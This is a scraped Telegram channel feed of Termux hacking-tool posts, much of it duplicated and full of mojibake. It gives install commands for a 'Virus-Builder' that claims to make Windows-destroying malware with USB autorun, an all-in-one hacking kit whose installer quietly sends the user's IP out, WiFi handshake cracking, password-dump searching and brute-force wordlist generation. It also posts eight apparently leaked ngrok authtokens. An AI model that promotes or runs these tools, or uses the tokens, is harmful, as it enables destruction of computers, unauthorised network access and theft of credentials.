ΒΆΒΆ Virus-Builder
This tool will generate a virus that can only destroy Windows computer. You can also configure to auto run in usb drive
πgit clone https://github.com/Saadkhan041/Virus-Builder/
πcd Virus-Builder
πls
πpip install -r requirements.txt
πpython3 Builder.py
Once Virus is generated! exit the tool and type 'cp ifection.bat/sdcard' without quotes
This tool will generate a virus that can only destroy Windows computer. You can also configure to auto run in usb drive
πgit clone https://github.com/Saadkhan041/Virus-Builder/
πcd Virus-Builder
πls
πpip install -r requirements.txt
πpython3 Builder.py
Once Virus is generated! exit the tool and type 'cp ifection.bat/sdcard' without quotes
ΒΆΒΆ geo-recon
#tracking #ip
An OSINT CLI tool desgined to fast track IP Reputation and Geo-locaton look up for Security Analysts
πgit clone https://github.com/radioactivetobi/geo-recon.git
πcd geo-recon
πchmod +x geo-recon.py
πsudo apt install python3-pip
πpython3 -m pip install --upgrade pip
πpip3 install -r requirements.txt
πpython3 geo-recon.py 138.121.128.19
ΒΆΒΆ Termux Setup
πgit clone https://github.com/radioactivetobi/geo-recon.git
πcd geo-recon
πchmod +x geo-recon.py
πpip3 install -r requirements.txt
#tracking #ip
An OSINT CLI tool desgined to fast track IP Reputation and Geo-locaton look up for Security Analysts
πgit clone https://github.com/radioactivetobi/geo-recon.git
πcd geo-recon
πchmod +x geo-recon.py
πsudo apt install python3-pip
πpython3 -m pip install --upgrade pip
πpip3 install -r requirements.txt
πpython3 geo-recon.py 138.121.128.19
ΒΆΒΆ Termux Setup
πgit clone https://github.com/radioactivetobi/geo-recon.git
πcd geo-recon
πchmod +x geo-recon.py
πpip3 install -r requirements.txt
ΒΆΒΆ h8mail
OSINT: Finding Email Passwords in Dumps with h8mail . Now we have a tool that can search through all of these databases and determine whether an email has been compromised and which data dump compromised it #osint #gmail #apikey
πsudo apt-get update && sudo apt-get upgrade -y
πapt install python3-pip
πpip3 install h8mail
h8mail help ( help list )
πh8mail -h or using python3 h8mail
ΒΆΒΆ Howcto install API key are below
https://www.hackers-arise.com/post/osint-finding-email-passwords-in-dumps-with-h8mail
OSINT: Finding Email Passwords in Dumps with h8mail . Now we have a tool that can search through all of these databases and determine whether an email has been compromised and which data dump compromised it #osint #gmail #apikey
πsudo apt-get update && sudo apt-get upgrade -y
πapt install python3-pip
πpip3 install h8mail
h8mail help ( help list )
πh8mail -h or using python3 h8mail
ΒΆΒΆ Howcto install API key are below
https://www.hackers-arise.com/post/osint-finding-email-passwords-in-dumps-with-h8mail
π1
Forwarded from Script Termux (σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ γ
€ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ σ ΙΝ’Ν’Ν’L)
ΒΆΒΆ AllHackingTools
#info #exploit #sql #url #web #camhack #ddos #phishing #hashcrack #xss #wireless #wifi #wordlist
if you want to set up a Termux quickly, here you are! More Hacking tools with one tool! And when you install All Hacking Tools, your IP is automatically sent and it will never be shared with other people, it is created for logging and system status <--
πgit clone https://github.com/mishakorzik/AllHackingTools
πcd AllHackingTools
πbash Install.sh
------------------------
#info #exploit #sql #url #web #camhack #ddos #phishing #hashcrack #xss #wireless #wifi #wordlist
if you want to set up a Termux quickly, here you are! More Hacking tools with one tool! And when you install All Hacking Tools, your IP is automatically sent and it will never be shared with other people, it is created for logging and system status <--
πgit clone https://github.com/mishakorzik/AllHackingTools
πcd AllHackingTools
πbash Install.sh
------------------------
β€2
Termux
ΒΆΒΆ AllHackingTools #info #exploit #sql #url #web #camhack #ddos #phishing #hashcrack #xss #wireless #wifi #wordlist if you want to set up a Termux quickly, here you are! More Hacking tools with one tool! And when you install All Hacking Tools, your IP isβ¦
ΒΆΒΆ #Free Ngrok authtokens:
26bDGGPyD3XWVtyzK3dfK401oIq_74Wi1m84A7rv9bP5YnihG
26bDzEjjfPls5kLHWGnG3K3voA7_69wkMBqUUExRHoA8v3gEL
26bESCvhbagWfGrHSv4NpTnSCpI_92oE8UFimPxU4nBNMK5T
26bEfSIlR1IcEEayMpRQlj0ttGw_3hrWetKnHZ4FMXc9hDt3Q
26p3rvZocfT7VzraejQNoCjPNN6_6UqEGG1izGcbE8ewtBchT
26p4VZpnXIjsiDq9YizXvkk6UAK_4ZyVi8D2Q63yWCap4LBbF
26p5O1vfFGLsdf9f8D3dzHAcmUv_454E7DaBz26mgs9yVkzQi
26t7bQBRJiFnK74z35eLcPYJPXI_2cyAyXVcEAnMTV9eAaYZw
---------------------------
ΒΆΒΆ configure ngrok
ngrok authtoken <βοΈsΠ΅lΠ΅ct free authtoken>
ΒΆΒΆ start ngrok
ngrok http 80
ΒΆΒΆ Run command to start AllHackingTools:
msdconsole
ΒΆΒΆ All commands below
msdconsole : start AllHackingTools
msdServer : Check AllHackingTools server
msdc : start AllHackingTools
Theme : Select Termux Theme
Standart : Select default keys
edit : Select nano keys
Others commands:
system : View My System
sys : View My System
26bDGGPyD3XWVtyzK3dfK401oIq_74Wi1m84A7rv9bP5YnihG
26bDzEjjfPls5kLHWGnG3K3voA7_69wkMBqUUExRHoA8v3gEL
26bESCvhbagWfGrHSv4NpTnSCpI_92oE8UFimPxU4nBNMK5T
26bEfSIlR1IcEEayMpRQlj0ttGw_3hrWetKnHZ4FMXc9hDt3Q
26p3rvZocfT7VzraejQNoCjPNN6_6UqEGG1izGcbE8ewtBchT
26p4VZpnXIjsiDq9YizXvkk6UAK_4ZyVi8D2Q63yWCap4LBbF
26p5O1vfFGLsdf9f8D3dzHAcmUv_454E7DaBz26mgs9yVkzQi
26t7bQBRJiFnK74z35eLcPYJPXI_2cyAyXVcEAnMTV9eAaYZw
---------------------------
ΒΆΒΆ configure ngrok
ngrok authtoken <βοΈsΠ΅lΠ΅ct free authtoken>
ΒΆΒΆ start ngrok
ngrok http 80
ΒΆΒΆ Run command to start AllHackingTools:
msdconsole
ΒΆΒΆ All commands below
msdconsole : start AllHackingTools
msdServer : Check AllHackingTools server
msdc : start AllHackingTools
Theme : Select Termux Theme
Standart : Select default keys
edit : Select nano keys
Others commands:
system : View My System
sys : View My System
Termux
ΒΆΒΆ Stryker - mobile pentest --Root-Your-Device-1st-- #android #kekstore #pwnterm #kekhunter #materialhunter #stryker #pixiedust #bruteforcepin #connectwithpin #passwordbruteforce #capturehandshake #clientdeauthing Test your networks for the most effectiveβ¦
Install ALFA AC1200 AWUS036ACH Driver On Kali Linux
#adapter #kalitools #wifiadapter wifiadapter
ΒΆΒΆ Realtek rtl8812au
ΒΆΒΆkali
https://cybersudo.org/install-alfa-ac1200-awus036ach-driver-on-kali-linux/
ΒΆΒΆ For windows
https://docs.alfa.com.tw/Product/AWUS036ACH/
#adapter #kalitools #wifiadapter wifiadapter
ΒΆΒΆ Realtek rtl8812au
ΒΆΒΆkali
https://cybersudo.org/install-alfa-ac1200-awus036ach-driver-on-kali-linux/
ΒΆΒΆ For windows
https://docs.alfa.com.tw/Product/AWUS036ACH/
Webkiller V2.0:-- Information Gathering #Tool Write in #Python.
Install:-
1. git clone https://github.com/ultrasecurity/webkiller.git
2. cd webkiller
3. pip3 install -r requirements.txt
4. python3 webkiller.py
Operating Systems Tested:-
1. #Kali #Linux 2020.1
2. #Windows 10
3. #Ubuntu 19.10
This project was created for educational purposes and should not be used in environments without legal authorization.
#Download #Link:-
https://github.com/ultrasecurity/webkiller
#cybersecurity #CyberSecurityNews #infosec #infosecurity #cybersecurityawareness #informationsecurity #pentesting #cybersecuritytraining #informationtechnology #bugbounty #ethicalhacking #OWASP #datasecurity #EthicalHackingOnlineTraining #hacking #hackers #kalilinux #onlinetraining #onlineclasses #AWS #CloudComputing
Visit Us : https://ncybersecurity.com
Twitter : https://twitter.com/NationalCyberS1
LinkedIn : https://in.linkedin.com/company/national-cyber-security-services
Telegram : https://t.me/ncybersecurity
Call/WA:- +918016167754
E-mail:- root@ncybersecurity.com
National Cyber Security Services
Install:-
1. git clone https://github.com/ultrasecurity/webkiller.git
2. cd webkiller
3. pip3 install -r requirements.txt
4. python3 webkiller.py
Operating Systems Tested:-
1. #Kali #Linux 2020.1
2. #Windows 10
3. #Ubuntu 19.10
This project was created for educational purposes and should not be used in environments without legal authorization.
#Download #Link:-
https://github.com/ultrasecurity/webkiller
#cybersecurity #CyberSecurityNews #infosec #infosecurity #cybersecurityawareness #informationsecurity #pentesting #cybersecuritytraining #informationtechnology #bugbounty #ethicalhacking #OWASP #datasecurity #EthicalHackingOnlineTraining #hacking #hackers #kalilinux #onlinetraining #onlineclasses #AWS #CloudComputing
Visit Us : https://ncybersecurity.com
Twitter : https://twitter.com/NationalCyberS1
LinkedIn : https://in.linkedin.com/company/national-cyber-security-services
Telegram : https://t.me/ncybersecurity
Call/WA:- +918016167754
E-mail:- root@ncybersecurity.com
National Cyber Security Services
GitHub
GitHub - ultrasecurity/webkiller: Tool Information Gathering Write By Python.
Tool Information Gathering Write By Python. Contribute to ultrasecurity/webkiller development by creating an account on GitHub.
π1
Termux
ΒΆΒΆ kali-Nethunter #nethunter #Nethunter #noroot ΒΆΒΆ install Nethunter store ΒΆΒΆ link ππ https://store.nethunter.com/ ΒΆΒΆ download Store app and install Nethunter KeX & hackers keyboard ΒΆΒΆ open termux πapt update πapt upgrade πapt install wget πwget -O installβ¦
repair-kex/install-nethunter:
https://github.com/mrfoxie/repair-kex/blob/master/install-nethunter
This is the tutorial to repair kex in rootless nethunter termux.
Repair Kex in Kali NetHunter Rootless
This is for kex repair and solve all vnc server error in kalinethunter
Installation-NetHunter:
https://github.com/mrfoxie/repair-kex
https://github.com/mrfoxie/repair-kex/blob/master/install-nethunter
This is the tutorial to repair kex in rootless nethunter termux.
Repair Kex in Kali NetHunter Rootless
This is for kex repair and solve all vnc server error in kalinethunter
Installation-NetHunter:
https://github.com/mrfoxie/repair-kex
GitHub
repair-kex/install-nethunter at master Β· mrfoxie/repair-kex
This is the tutorial to repair kex in rootless nethunter termux. - mrfoxie/repair-kex
This media is not supported in your browser
VIEW IN TELEGRAM
ΒΆΒΆ OSINT Email- using Holehe & Efficiently finding registered accounts from emails #osint
Overview:
Manually investigating email addresses can be a tedious task especially when faced with the prospect of manually verifying whether an email address has been registered on individual websites. At the same time, this process is fraught with a very serious risk β one wrong move can trigger a red flag and warn the target. One solution to this problem is Holehe, a very neat Python-based script that enables Digital Investigators to check whether an email address is used across several online sources such as social media, shopping and adult-oriented websites. The full list is quite extensive, but it includes:
Installation:
πsudo apt update
πgit clone https://github.com/megadose/holehe.git
πcd holehe-master
πsudo python3 setup.py install
πsudo holhe -h
πsudo holehe test@gmail.com
πsudo holehe test@gmail.com --csv
#Holehe #AlienByte2.0 #KaliLiniux
Overview:
Manually investigating email addresses can be a tedious task especially when faced with the prospect of manually verifying whether an email address has been registered on individual websites. At the same time, this process is fraught with a very serious risk β one wrong move can trigger a red flag and warn the target. One solution to this problem is Holehe, a very neat Python-based script that enables Digital Investigators to check whether an email address is used across several online sources such as social media, shopping and adult-oriented websites. The full list is quite extensive, but it includes:
Installation:
πsudo apt update
πgit clone https://github.com/megadose/holehe.git
πcd holehe-master
πsudo python3 setup.py install
πsudo holhe -h
πsudo holehe test@gmail.com
πsudo holehe test@gmail.com --csv
#Holehe #AlienByte2.0 #KaliLiniux
ΒΆΒΆ asnmap
ASNmap is a brand new CLI tool, written in Golang, used to query Autonomous System data. The data is pulled from https://api.asnmap.sh, which returns data that is parsed from Frank Denis' legendary IPtoASN database.Put simply, ASNMap converts:
Organization names to CIDR ranges
ASN numbers to CIDR ranges
IP addresses to CIDR ranges
Domain names to CIDR ranges
The results can be viewed in JSON, CSV and text formats, so it's easy to pipe the output into other tools.
more info : https://blog.projectdiscovery.io/asnmap/
πgit clone https://github.com/projectdiscovery/asnmap
πcd asnmap/cmd/asnmap
πgo build
π./asnmap
ΒΆΒΆ Input options
These options tell ASNMap what type of data you are feeding it:
-a or -asn is for querying an AS number, e.g. -a AS5650
-i or -ip is for querying an IP address, e.g. -i 100.19.12.21
-d or -domain is for querying a domain name, e.g. -d google.com
-org is for querying an organization name, e.g. -o GOOGLE
ASNmap is a brand new CLI tool, written in Golang, used to query Autonomous System data. The data is pulled from https://api.asnmap.sh, which returns data that is parsed from Frank Denis' legendary IPtoASN database.Put simply, ASNMap converts:
Organization names to CIDR ranges
ASN numbers to CIDR ranges
IP addresses to CIDR ranges
Domain names to CIDR ranges
The results can be viewed in JSON, CSV and text formats, so it's easy to pipe the output into other tools.
more info : https://blog.projectdiscovery.io/asnmap/
πgit clone https://github.com/projectdiscovery/asnmap
πcd asnmap/cmd/asnmap
πgo build
π./asnmap
ΒΆΒΆ Input options
These options tell ASNMap what type of data you are feeding it:
-a or -asn is for querying an AS number, e.g. -a AS5650
-i or -ip is for querying an IP address, e.g. -i 100.19.12.21
-d or -domain is for querying a domain name, e.g. -d google.com
-org is for querying an organization name, e.g. -o GOOGLE
Media is too big
VIEW IN TELEGRAM
ΒΆΒΆ Stryker
latest updates on Stryker app
#wifi
A powerful pentest tool in your mobile device
https://stryker.zalex.dev/
For more info : https://strykerdefence.com/#download
ΒΆΒΆ Rooted device which supported monitor mode and packet injection
WiFi vulnerabilities scanner
Local network vulnerabilities scanner
NetCut
Exploit Engine
GeoMac
Metasploit Framework
Captive Portal
Site vulnerabilities scanner
Payload generator
Online exploit library
35+ protocols brute
Captive Portal Bypass (upcoming)
ΒΆΒΆ To add,wordlist open file manager & go to Stryker folder /wordlist/ and add your wordlist
( my device : Samsung Note9/Rooted)
ΒΆΒΆ Telegram
stryker project : https://t.me/strykerdefence
https://t.me/strykereng
https://t.me/strykerapp
latest updates on Stryker app
#wifi
A powerful pentest tool in your mobile device
https://stryker.zalex.dev/
For more info : https://strykerdefence.com/#download
ΒΆΒΆ Rooted device which supported monitor mode and packet injection
WiFi vulnerabilities scanner
Local network vulnerabilities scanner
NetCut
Exploit Engine
GeoMac
Metasploit Framework
Captive Portal
Site vulnerabilities scanner
Payload generator
Online exploit library
35+ protocols brute
Captive Portal Bypass (upcoming)
ΒΆΒΆ To add,wordlist open file manager & go to Stryker folder /wordlist/ and add your wordlist
( my device : Samsung Note9/Rooted)
ΒΆΒΆ Telegram
stryker project : https://t.me/strykerdefence
https://t.me/strykereng
https://t.me/strykerapp
π2
ΒΆΒΆ Drivers :
https://github.com/RinCat/RTL88x2BU-Linux-Driver
#wifiadapter #kalitools wifiadapter
#vif not supported
install the drivers & it works fine . around $10 from Aliexpress
https://github.com/RinCat/RTL88x2BU-Linux-Driver
#wifiadapter #kalitools wifiadapter
#vif not supported
install the drivers & it works fine . around $10 from Aliexpress
Media is too big
VIEW IN TELEGRAM
ΒΆΒΆ Wifi-Hacking/
#aircrack-ng #wpscrack #handshakecapture #wordlist #deauthclients
Cyber Security Tool For Hacking Wireless Connections Using Built-In Kali Tools. Supports All Securities (WEP, WPS, WPA, WPA2/TKIP/IES)
ΒΆΒΆ Feutures and Contains :
1)Start monitor mode
2)Stop monitor mode
3)Scan Networks
4)Getting Handshake
5)Create wordlist
6)Install Wireless tools
7)WPS Networks attacks
8)Scan for WPS Networks
9)Crack Handshake with rockyou.txt
10)Crack Handshake with wordlist
11)Crack Handshake without wordlist
ΒΆΒΆ Kali Linux / Ubuntu / Parrot OS
πsudo apt update
πsudo apt upgrade
πsudo apt-get dist-upgrade
reboot (exit & open again )
πsudo git clone https://github.com/ankit0183/Wifi-Hacking
πcd Wifi-Hacking/
πsudo python3 Wifi-Hacking.py
#aircrack-ng #wpscrack #handshakecapture #wordlist #deauthclients
Cyber Security Tool For Hacking Wireless Connections Using Built-In Kali Tools. Supports All Securities (WEP, WPS, WPA, WPA2/TKIP/IES)
ΒΆΒΆ Feutures and Contains :
1)Start monitor mode
2)Stop monitor mode
3)Scan Networks
4)Getting Handshake
5)Create wordlist
6)Install Wireless tools
7)WPS Networks attacks
8)Scan for WPS Networks
9)Crack Handshake with rockyou.txt
10)Crack Handshake with wordlist
11)Crack Handshake without wordlist
ΒΆΒΆ Kali Linux / Ubuntu / Parrot OS
πsudo apt update
πsudo apt upgrade
πsudo apt-get dist-upgrade
reboot (exit & open again )
πsudo git clone https://github.com/ankit0183/Wifi-Hacking
πcd Wifi-Hacking/
πsudo python3 Wifi-Hacking.py
π2
ΒΆΒΆ psudohas
#wordlist
psudohash is a password list generator for orchestrating brute force attacks. It imitates certain password creation patterns commonly used by humans, like substituting a wordβs letters with symbols or numbers, using char-case variations, adding a common padding before or after the word and more. It is keyword-based and highly customizable.
git clone https://github.com/t3l3machus/psudohash
cd ./psudohash
chmod +x psudohash.py
./psudohash.py -h
./psudohash.py -w password -cpa
./psudohash.py [-h] -w WORDS [-an LEVEL] [-nl LIMIT] [-y YEARS] [-ap VALUES] [-cpb] [-cpa] [-cpo] [-o FILENAME] [-q]
Combining options --years and --append-numbering with a --numbering-limit β₯ last two digits of any year input, will most likely produce duplicate words because of the mutation patterns implemented by the tool.
#wordlist
psudohash is a password list generator for orchestrating brute force attacks. It imitates certain password creation patterns commonly used by humans, like substituting a wordβs letters with symbols or numbers, using char-case variations, adding a common padding before or after the word and more. It is keyword-based and highly customizable.
git clone https://github.com/t3l3machus/psudohash
cd ./psudohash
chmod +x psudohash.py
./psudohash.py -h
./psudohash.py -w password -cpa
./psudohash.py [-h] -w WORDS [-an LEVEL] [-nl LIMIT] [-y YEARS] [-ap VALUES] [-cpb] [-cpa] [-cpo] [-o FILENAME] [-q]
Combining options --years and --append-numbering with a --numbering-limit β₯ last two digits of any year input, will most likely produce duplicate words because of the mutation patterns implemented by the tool.
π3β€2